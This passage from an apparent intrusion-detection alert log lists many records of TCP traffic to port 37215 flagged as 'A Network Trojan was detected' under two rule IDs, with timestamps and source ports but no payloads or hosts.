              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.378160
              SID:2829579
              Source Port:54602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.526944
              SID:2835222
              Source Port:53134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575270
              SID:2835222
              Source Port:44754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.542238
              SID:2829579
              Source Port:37270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.526849
              SID:2835222
              Source Port:54554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.208265
              SID:2829579
              Source Port:48320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.282382
              SID:2829579
              Source Port:35076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368429
              SID:2835222
              Source Port:48980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.635629
              SID:2829579
              Source Port:51916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.701030
              SID:2835222
              Source Port:53380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.097345
              SID:2829579
              Source Port:45428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.629424
              SID:2829579
              Source Port:52406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926618
              SID:2835222
              Source Port:46040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536204
              SID:2835222
              Source Port:57762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.987171
              SID:2835222
              Source Port:54812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279074
              SID:2835222
              Source Port:32784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.495275
              SID:2835222
              Source Port:36122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.817765
              SID:2829579
              Source Port:57476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572420
              SID:2835222
              Source Port:33190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.118235
              SID:2829579
              Source Port:34720
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.506284
              SID:2829579
              Source Port:46214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.125475
              SID:2829579
              Source Port:37664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.318009
              SID:2829579
              Source Port:60364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.568324
              SID:2829579
              Source Port:47570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055457
              SID:2835222
              Source Port:49278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.462954
              SID:2829579
              Source Port:50856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.920815
              SID:2829579
              Source Port:46482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187071
              SID:2829579
              Source Port:38794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.529957
              SID:2835222
              Source Port:57080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.875672
              SID:2829579
              Source Port:40352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.103680
              SID:2829579
              Source Port:54778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726105
              SID:2829579
              Source Port:33856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.202966
              SID:2829579
              Source Port:59054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.480601
              SID:2835222
              Source Port:38200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.077635
              SID:2835222
              Source Port:41786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.128699
              SID:2829579
              Source Port:35370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923968
              SID:2829579
              Source Port:58880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.525155
              SID:2835222
              Source Port:49314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.347551
              SID:2835222
              Source Port:59656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661964
              SID:2835222
              Source Port:40214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.879411
              SID:2835222
              Source Port:37118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.246589
              SID:2829579
              Source Port:52214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.447160
              SID:2829579
              Source Port:49404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535213
              SID:2835222
              Source Port:45414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.109536
              SID:2835222
              Source Port:35460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.450406
              SID:2829579
              Source Port:46082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.391536
              SID:2829579
              Source Port:42000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.489592
              SID:2835222
              Source Port:49448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186987
              SID:2835222
              Source Port:41432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.860336
              SID:2829579
              Source Port:53992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.152771
              SID:2829579
              Source Port:43676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.535500
              SID:2835222
              Source Port:34200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459676
              SID:2835222
              Source Port:44264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.456332
              SID:2835222
              Source Port:43640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536323
              SID:2829579
              Source Port:39418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.269330
              SID:2835222
              Source Port:36518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536003
              SID:2835222
              Source Port:52660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.580544
              SID:2829579
              Source Port:54084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.290205
              SID:2835222
              Source Port:57490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459531
              SID:2829579
              Source Port:41308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.978038
              SID:2835222
              Source Port:54008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341148
              SID:2829579
              Source Port:54500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.368569
              SID:2829579
              Source Port:53992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.545708
              SID:2835222
              Source Port:57414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.130251
              SID:2835222
              Source Port:47706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482200
              SID:2835222
              Source Port:54984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.234129
              SID:2829579
              Source Port:47434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459643
              SID:2835222
              Source Port:49494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663628
              SID:2835222
              Source Port:35618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.694779
              SID:2835222
              Source Port:56802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053235
              SID:2835222
              Source Port:37592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.576518
              SID:2829579
              Source Port:49914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.347740
              SID:2835222
              Source Port:41264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.076897
              SID:2829579
              Source Port:46096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.194456
              SID:2829579
              Source Port:34152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.871941
              SID:2829579
              Source Port:52334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.635807
              SID:2829579
              Source Port:44642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233369
              SID:2829579
              Source Port:36558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099774
              SID:2835222
              Source Port:49062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517885
              SID:2829579
              Source Port:35088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.921216
              SID:2829579
              Source Port:37902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537748
              SID:2835222
              Source Port:56008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.533333
              SID:2829579
              Source Port:38896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235755
              SID:2829579
              Source Port:60088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.583898
              SID:2829579
              Source Port:37028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395007
              SID:2829579
              Source Port:46916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.079761
              SID:2835222
              Source Port:43962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448777
              SID:2829579
              Source Port:38480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856729
              SID:2835222
              Source Port:51612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.197455
              SID:2835222
              Source Port:57920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361549
              SID:2829579
              Source Port:40316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100948
              SID:2835222
              Source Port:41002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726748
              SID:2835222
              Source Port:51880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.075435
              SID:2829579
              Source Port:43618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.199922
              SID:2835222
              Source Port:38540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.799061
              SID:2829579
              Source Port:57312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.168654
              SID:2835222
              Source Port:51722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.522543
              SID:2829579
              Source Port:33388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.457753
              SID:2829579
              Source Port:50436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574681
              SID:2835222
              Source Port:46524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.576391
              SID:2835222
              Source Port:56722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.102376
              SID:2829579
              Source Port:50278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.428267
              SID:2829579
              Source Port:54904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.827982
              SID:2829579
              Source Port:36380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.570657
              SID:2829579
              Source Port:52244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186467
              SID:2829579
              Source Port:57452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.040534
              SID:2829579
              Source Port:55486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.202533
              SID:2829579
              Source Port:37536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858464
              SID:2829579
              Source Port:39476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.870401
              SID:2835222
              Source Port:51962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.111911
              SID:2829579
              Source Port:44202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.928864
              SID:2835222
              Source Port:40912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279004
              SID:2829579
              Source Port:43022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.153247
              SID:2829579
              Source Port:47380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.432201
              SID:2829579
              Source Port:55412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.067939
              SID:2835222
              Source Port:45238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.078571
              SID:2835222
              Source Port:49642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.531838
              SID:2835222
              Source Port:47414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397717
              SID:2829579
              Source Port:49916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.398324
              SID:2829579
              Source Port:45332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.446951
              SID:2835222
              Source Port:58348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858923
              SID:2829579
              Source Port:51730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537559
              SID:2829579
              Source Port:35590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.067402
              SID:2829579
              Source Port:55642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624757
              SID:2835222
              Source Port:33696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.636822
              SID:2835222
              Source Port:47298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663654
              SID:2835222
              Source Port:59218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.763846
              SID:2829579
              Source Port:36044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623000
              SID:2829579
              Source Port:54508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.250904
              SID:2835222
              Source Port:51122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.544271
              SID:2829579
              Source Port:42102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.819511
              SID:2835222
              Source Port:47160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.105673
              SID:2835222
              Source Port:49730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.492523
              SID:2829579
              Source Port:42800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575427
              SID:2829579
              Source Port:53652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764894
              SID:2835222
              Source Port:55890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.249734
              SID:2835222
              Source Port:45048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.061404
              SID:2829579
              Source Port:58948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.398433
              SID:2829579
              Source Port:57456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537064
              SID:2829579
              Source Port:56140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.474718
              SID:2829579
              Source Port:39750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.467824
              SID:2829579
              Source Port:59010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.115332
              SID:2835222
              Source Port:58990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.111431
              SID:2829579
              Source Port:60770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.403046
              SID:2829579
              Source Port:51878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.164083
              SID:2835222
              Source Port:50394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.819463
              SID:2829579
              Source Port:35664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368535
              SID:2829579
              Source Port:42174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.543617
              SID:2835222
              Source Port:34336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.544180
              SID:2835222
              Source Port:39156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100717
              SID:2829579
              Source Port:45934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.068034
              SID:2829579
              Source Port:51478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574722
              SID:2835222
              Source Port:37914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.692631
              SID:2835222
              Source Port:58856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724236
              SID:2829579
              Source Port:52682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.045421
              SID:2835222
              Source Port:40246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055720
              SID:2829579
              Source Port:46466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098867
              SID:2829579
              Source Port:34524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.487366
              SID:2835222
              Source Port:46136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.503380
              SID:2829579
              Source Port:42270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.634724
              SID:2835222
              Source Port:46614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573388
              SID:2829579
              Source Port:59352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.400682
              SID:2829579
              Source Port:47500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.393893
              SID:2835222
              Source Port:33282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.696114
              SID:2829579
              Source Port:35346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.662648
              SID:2829579
              Source Port:51296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.420366
              SID:2835222
              Source Port:36016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.077038
              SID:2835222
              Source Port:46182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.585084
              SID:2829579
              Source Port:50800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433623
              SID:2835222
              Source Port:50388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.693223
              SID:2835222
              Source Port:58418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.705381
              SID:2835222
              Source Port:51108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.153258
              SID:2829579
              Source Port:55674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186178
              SID:2835222
              Source Port:47178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764885
              SID:2829579
              Source Port:47184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.284817
              SID:2829579
              Source Port:35534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.798831
              SID:2829579
              Source Port:57260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.443683
              SID:2835222
              Source Port:57036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724617
              SID:2835222
              Source Port:36538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725307
              SID:2835222
              Source Port:57632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.445492
              SID:2835222
              Source Port:49872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.594626
              SID:2835222
              Source Port:52978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.254465
              SID:2835222
              Source Port:52066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.119407
              SID:2829579
              Source Port:56588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.706498
              SID:2829579
              Source Port:53678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.540630
              SID:2829579
              Source Port:47318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.592052
              SID:2829579
              Source Port:53656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623899
              SID:2835222
              Source Port:56568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.423464
              SID:2829579
              Source Port:37692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.458308
              SID:2829579
              Source Port:35652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.404430
              SID:2835222
              Source Port:46162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.538235
              SID:2829579
              Source Port:49602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.662571
              SID:2829579
              Source Port:56600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395748
              SID:2835222
              Source Port:52398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.598083
              SID:2835222
              Source Port:44948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.796195
              SID:2835222
              Source Port:47704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.080862
              SID:2835222
              Source Port:49276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
